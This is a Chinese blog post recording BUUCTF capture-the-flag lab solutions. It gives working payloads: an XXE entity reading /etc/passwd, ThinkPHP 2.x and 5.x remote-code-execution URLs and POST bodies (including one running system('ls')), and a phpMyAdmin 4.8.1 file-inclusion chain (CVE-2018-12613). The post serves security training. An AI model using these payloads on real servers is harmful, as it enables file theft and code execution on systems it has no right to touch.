• BUUCTF刷题记录REAL类


    1.[PHP]XXE

    libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡
    dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞

    用burp抓包,在后方修改加入payload
    payload:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE xxe [
        <!ELEMENT name ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >
    ]>
    <root>
        <name>&xxe;</name>
    </root>

    2.[ThinkPHP]5-Rce

    Thinkphp5 5.0.22/5.1.29远程代码执行漏洞:

    直接在网址后面加,在phpinfo中找到flag

    /index.php?s=/Index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
    /index.php?s=/Index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

    3.[ThinkPHP]5.0.23-Rce

    远程执行漏洞

    用hackbar构造如下内容

    POST /?s=captcha
    
    _method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=-1&method=get


    4.[ThinkPHP]2-Rce

    ThinkPHP 2.x 的任意代码执行漏洞

     payload:

    http://node3.buuoj.cn:29851/index.php?s=/index/index/name/$%7B@phpinfo()%7D
    直接显示phpinfo

    5.[PHPMYADMIN]CVE-2018-12613

    phpmyadmin 4.8.1 远程文件包含漏洞 (CVE-2018-12613)

     SELECT '<?=phpinfo()?>';

    进入查看session

    利用session构造payload

     

     http://node3.buuoj.cn:25034/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_02cc9bb1299867829f635ebcf8ec15df

    成功得到flag

  • 相关阅读:
    编译预处理命令define
    共享数据的包含const
    友元类,友元函数
    静态成员static
    this 指针
    构造函数与析构函数
    c++类的基础
    void指针和const指针
    c++基础
    组播的实现
  • 原文地址:https://www.cnblogs.com/p201721420016/p/12608824.html
Copyright © 2020-2023  润新知